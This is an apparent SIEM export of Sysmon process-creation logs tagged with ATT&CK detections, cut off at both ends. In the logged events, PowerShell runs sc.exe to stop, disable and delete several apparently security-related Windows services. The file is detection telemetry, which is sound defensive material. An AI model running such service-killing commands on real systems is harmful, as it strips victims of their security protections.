MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.418366400Z"",""eventRecordID"":""2716"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.415\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001019422100}\r\nProcessId: 876\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.415"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001019422100}"",""processId"":""876"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.528",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.345 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010ec3e2100} +ProcessId: 7288 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.351532400Z"",""eventRecordID"":""2713"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.345\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010ec3e2100}\r\nProcessId: 7288\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.345"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010ec3e2100}"",""processId"":""7288"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.479",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.261 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010643b2100} +ProcessId: 3856 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.268513600Z"",""eventRecordID"":""2710"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.261\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010643b2100}\r\nProcessId: 3856\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.261"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010643b2100}"",""processId"":""3856"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.432",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.221 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010293a2100} +ProcessId: 4500 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config 360rTys Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config 360rTys Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.226531100Z"",""eventRecordID"":""2709"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.221\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010293a2100}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config 360rTys Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.221"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-0010293a2100}"",""processId"":""4500"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config 360rTys Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.401",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.184 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-001025382100} +ProcessId: 6932 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.188449900Z"",""eventRecordID"":""2707"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.184\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-001025382100}\r\nProcessId: 6932\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.184"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-001025382100}"",""processId"":""6932"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.355",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.128 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-00107e352100} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.131701200Z"",""eventRecordID"":""2704"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.128\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-00107e352100}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:29.128"",""processGuid"":""{df9fc3d3-b395-5ecf-0000-00107e352100}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.310",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:29.089 +ProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c8332100} +ProcessId: 1988 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:29.091265800Z"",""eventRecordID"":""2702"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:29.089\r\nProcessGuid: {df9fc3d3-b395-5ecf-0000-0010c8332100}\r\nProcessId: 1988\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 